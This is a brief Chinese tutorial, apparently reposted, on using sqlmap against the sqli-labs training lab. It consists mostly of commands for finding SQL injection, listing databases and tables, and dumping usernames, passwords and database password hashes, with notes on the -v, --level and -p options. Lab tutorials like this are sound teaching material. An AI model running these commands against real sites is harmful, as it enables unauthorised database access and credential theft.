python sqlmap.py -u"http://192.168.2.33/sqli-labs/Less-1/?id=1"
在检测过程中会有大量的交互选项,如果懒得选可以使用--batch参数
python sqlmap.py -u"http://192.168.2.33/sqli-labs/Less-1/?id=1" --batch
python sqlmap.py -u"http://192.168.2.33/sqli-labs/Less-1/?id=1" --dbs
python sqlmap.py -u"http://192.168.2.33/sqli-labs/Less-1/?id=1" -D security --tables
-D security //指定数据库security
python sqlmap.py -u "http://192.168.2.33/sqli-labs/Less-1/?id=1" -D security -T users --columns
python sqlmap.py -u "http://192.168.2.33/sqli-labs/Less-1/?id=1" -D security -T users -C"id,password,username" --dump
python sqlmap.py -u "http://192.168.2.33/sqli-labs/Less-1/?id=1" -D security -T users -C"id,password,username" --start 1 --stop 10 --dump
python sqlmap.py -u "http://192.168.2.33/sqli-labs/Less-1/?id=1" --current-db
python sqlmap.py -u "http://192.168.2.33/sqli-labs/Less-1/?id=1" --current-user
python sqlmap.py -u "http://192.168.2.33/sqli-labs/Less-1/?id=1" --users
python sqlmap.py -u "http://192.168.2.33/sqli-labs/Less-1/?id=1" --passwords
0、只显示python错误以及严重的信息。
1、同时显示基本信息和警告信息。(默认)
2、同时显示debug信息。
3、同时显示注入的payload。
4、同时显示HTTP请求。
5、同时显示HTTP响应头。
6、同时显示HTTP响应页面。
等级是指测试结果的输出的详细程度,根据测试,--level等级的提高得到的效果远比-v等级提高得到的效果好,如果你想看到sqlmap发送的测试payload最好的等级就是3。
python sqlmap.py -u "http://192.168.2.33/sqli-labs/Less-1/?id=1" --level 3
sqlmap默认测试所有的GET和POST参数,当--level的值大于等于2的时候也会测试HTTP Cookie头的值,当大于等于3的时候也会测试User-Agent和HTTP Referer头的值。但是你可以手动用-p参数设置想要测试的参数。例如: -p "id,user-anget"
原文:https://www.cnblogs.com/R-S-PY/p/12202570.html